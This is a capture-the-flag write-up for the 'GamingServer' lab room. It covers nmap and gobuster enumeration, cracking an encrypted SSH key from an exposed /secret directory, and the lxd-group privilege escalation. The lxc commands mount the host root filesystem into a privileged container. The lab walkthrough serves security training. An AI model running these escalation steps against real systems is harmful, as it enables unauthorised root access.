Table of Contents

Room: GamingServer

Difficulty: Easy

An Easy Boot2Root box for beginners

Task 1 Boot2Root

Can you gain access to this gaming server built by amateurs with no experience of web development and take advantage of the deployment system.

Task 1.1 - What is the user flag?

REDACTED

I did my usual nmap scan nmap -T4 -sC -sV <IP>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
|   256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_  256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: House of danak
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We got port 22 and 80 open, lets manually enumerate the website (interact with the website and inspect the source code):

website_main_page

It looks like a gaming website.

username

We got a potential username, lets take a note of that and proceed with our manual enumeration.

uploads_dir

/about.html leads to /uploads directory which contains some interesting files:

password_list

We got Hacker Manifesto by The Mentor and a meme.jpg:

meme

OK, after taking some motivation and laughter, lets smash the room.

We also got a password file: ‘dict.lst’, I tried hydra on ssh using the information that we found (username:john and passwords:dict.lst) but got nothing, so let’s further enumerate the website to find out where can we use these:

Let’s do a gobuster scan: gobuster dir -u http://<IP>/ -w /usr/share/wordlists/dirb/common.txt -x txt,php,zip

/about.php (Status: 200)
/index.html (Status: 200)
/robots.txt (Status: 200)
/secret (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)

There’s a /secret directory, lets visit this:

private_rsa_key

We found a rsa private key, and it is password protected (we know that because the key has these two lines in the header):

Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547

Lets crack it with that password list:

cracked_key

Cool, we cracked the password, lets get in to the system via ssh:

we_are_in

We can see that user ‘john’ is in ‘sudo’ and ‘lxd’ group (both are potential privesc vectors), we don’t have user ‘john’s password on the system so we can’t use ‘sudo’ group privesc vector but the system is Ubuntu 18.04, that means that we probably can escalate privileges with ‘lxd’ group permissions that user john have.

We got our user.txt in the home directory:

john@exploitable:~$ ls
user.txt
john@exploitable:~$ cat user.txt 
REDACTED
john@exploitable:~$

Task 1.2 - What is the root flag?

REDACTED

As you have seen that user ‘john’ is in lxd group, that means we can take advantage of it to gain root.

Privilege Escalation

  • Download build-alpine in your machine through the git repository & execute the script build-alpine to build the latest Alpine image as a tar.gz file (execute as the root user):
#!/bin/bash
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
  • Transfer the tar.gz file from attacker machine to the target machine: I did it with python3 http server and wget.
  • After that, execute the following commands to import, configure, start, and execute the lxc container:
#!/bin/bash
lxc image import ./lxd-alpine.tar.gz --alias myimage
lxc image list
lxc init myimage gamingserver -c security.privileged=true
lxc config device add gamingserver mydevice disk source=/ path=/mnt/root recursive=true
lxc list
lxc start gamingserver
lxc exec gamingserver /bin/sh

Note: The filesystem is mounted in /mnt directory inside the container.

lxc

That is all for this room, I hope you enjoyed it, happy hacking 🔥

Resources